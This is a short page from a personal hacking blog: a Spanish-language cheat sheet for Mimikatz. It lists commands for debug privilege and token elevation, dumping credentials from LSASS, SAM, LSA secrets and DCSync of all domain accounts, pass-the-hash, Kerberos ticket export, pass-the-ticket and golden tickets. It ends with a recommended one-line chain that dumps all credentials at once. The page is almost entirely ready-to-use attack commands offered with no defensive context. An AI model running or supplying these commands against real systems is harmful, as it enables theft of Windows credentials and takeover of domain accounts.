Grunt's personal blog

this is my personal blog for my hacking stuff, my degree stuff, etc

View on GitHub

Mimikatz

Comandos básicos

privilege::debug

token::elevate

version

Dumpear creds

sekurlsa::logonpasswords

sekurlsa::pth /user:USER /domain:DOMAIN /ntlm:NTHASH /run:COMMAND

lsadump::sam

lsadump::lsa /patch

lsadump::dcsync /user:USERNAME

lsadump::dcsync /all /csv

Intentar habilitar WDigest para almacenar credenciales en texto plano

Kerberos

kerberos::list /export

kerberos::ptt FILE.kirbi

kerberos::golden

Seguidilla de comandos al conseguir mimikatz recomendada

.\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /inject" "lsadump::sam" "lsadump::cache""sekurlsa::ekeys" "exit"